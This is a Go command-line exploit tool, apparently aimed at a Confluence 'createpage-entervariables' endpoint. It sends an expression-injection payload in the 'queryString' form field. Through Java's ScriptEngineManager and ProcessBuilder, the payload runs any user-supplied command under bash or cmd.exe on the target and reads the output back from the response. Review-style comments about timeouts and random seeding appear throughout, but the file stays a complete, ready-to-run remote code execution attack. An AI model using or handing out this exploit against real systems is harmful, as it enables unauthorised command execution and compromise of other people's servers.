package main
import (
"flag"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"os"
"strings"
"math/rand"
"time"
"github.com/fatih/color"
)
// exploit sends one POST request to targetURL+path with the injection payload
// carried in the form field named injectionParam, then inspects the response
// body for the two random marker strings to decide whether the injected
// expression was evaluated server-side.
//
// It never returns an error: every failure path prints a message and calls
// os.Exit(1), so the function cannot be reused by a caller that needs to
// recover or report. NOTE(review): http.PostForm goes through
// http.DefaultClient, which has no timeout, so a host that accepts the
// connection and never answers hangs this process indefinitely.
func exploit(targetURL string, path string, injectionParam string, command string) {
	// Plain concatenation: neither a trailing slash on targetURL nor a missing
	// leading slash on path is normalised here.
	fullURL := targetURL + path
	// Two random markers bracket the injected expression so its output can be
	// located inside an otherwise arbitrary HTML response.
	startTag := generateRandomString(8)
	endTag := generateRandomString(8)
	// command is interpolated into the payload verbatim (second %s); no
	// escaping or validation is applied to it.
	payload := fmt.Sprintf("%s\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022%s\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027%s", startTag, command, endTag)
	// Form-encode the payload under the caller-chosen parameter name.
	params := url.Values{
		injectionParam: {payload},
	}
	// Send the POST request (no timeout, see NOTE above).
	resp, err := http.PostForm(fullURL, params)
	if err != nil {
		color.Red("[-] An error occurred:", err)
		os.Exit(1)
	}
	defer resp.Body.Close()
	// The whole body is buffered in memory with no size cap.
	// ioutil.ReadAll is deprecated in favour of io.ReadAll since Go 1.16.
	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		color.Red("[-] Failed to read response:", err)
		os.Exit(1)
	}
	// Presence of both markers is treated as evidence that the expression was
	// evaluated; the HTTP status code is not consulted at all.
	if strings.Contains(string(body), startTag) && strings.Contains(string(body), endTag) {
		color.Green("[+] Vulnerability detected")
		// The output is expected between startTag+"[" and "\n]"+endTag.
		// extractValue exits the process if either bound is missing, even
		// though both bare markers were just found above.
		value := extractValue(string(body), startTag + "[", "\n]" + endTag)
		// Print the extracted value.
		color.Blue("[*] Extracted value:")
		fmt.Println(value)
	} else {
		color.Red("[-] No vulnerability detected")
	}
}
// extractValue returns the part of content that lies between the first
// occurrence of startTag and the first occurrence of endTag after it.
//
// Missing tags are fatal: the function prints a message and exits the process
// with status 1 instead of returning an error, so callers never observe the
// failure case.
func extractValue(content, startTag, endTag string) string {
	openAt := strings.Index(content, startTag)
	if openAt < 0 {
		color.Red("[-] Failed to find start tag")
		os.Exit(1)
	}
	// Only the text after the start tag is searched for the end tag.
	rest := content[openAt+len(startTag):]
	closeAt := strings.Index(rest, endTag)
	if closeAt < 0 {
		color.Red("[-] Failed to find end tag")
		os.Exit(1)
	}
	return rest[:closeAt]
}
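// markerRand is a private math/rand generator seeded once at start-up. It is
// not safe for concurrent use, which matches this single-threaded program.
var markerRand = rand.New(rand.NewSource(time.Now().UnixNano()))

// generateRandomString returns a string of length pseudo-random ASCII letters
// drawn from a-z and A-Z. A length of zero or less yields "".
//
// The previous implementation called rand.Seed(time.Now().UnixNano()) on every
// invocation: that mutates the package-level source shared with any other
// caller, is deprecated since Go 1.20, and makes two calls in the same clock
// tick return identical strings (so start and end markers could collide on a
// platform with a coarse clock). Seeding a private generator once avoids all
// three. math/rand is not cryptographically secure; the result is only meant
// to serve as an unpredictable-enough response marker.
func generateRandomString(length int) string {
	const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
	if length <= 0 {
		return ""
	}
	var sb strings.Builder
	sb.Grow(length)
	for i := 0; i < length; i++ {
		sb.WriteByte(letters[markerRand.Intn(len(letters))])
	}
	return sb.String()
}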
// main parses the command-line flags and performs a single injection attempt.
//
// Flags: -u target base URL (required), -c command to run (required), and
// -p URL path, which defaults to the createpage-entervariables action. The
// injected form parameter name is fixed to "queryString".
func main() {
	var (
		cmd    string
		path   string
		target string
	)
	flag.StringVar(&cmd, "c", "", "Command to execute")
	flag.StringVar(&path, "p", "/pages/createpage-entervariables.action?SpaceKey=x", "URL path")
	flag.StringVar(&target, "u", "", "Target URL")
	flag.Parse()

	// -u and -c have no defaults, so an empty value means the flag was omitted.
	missingRequired := cmd == "" || target == ""
	if missingRequired {
		color.Blue("[*] Please provide the target URL (-u) and command to execute (-c)")
		os.Exit(1)
	}

	exploit(target, path, "queryString", cmd)
}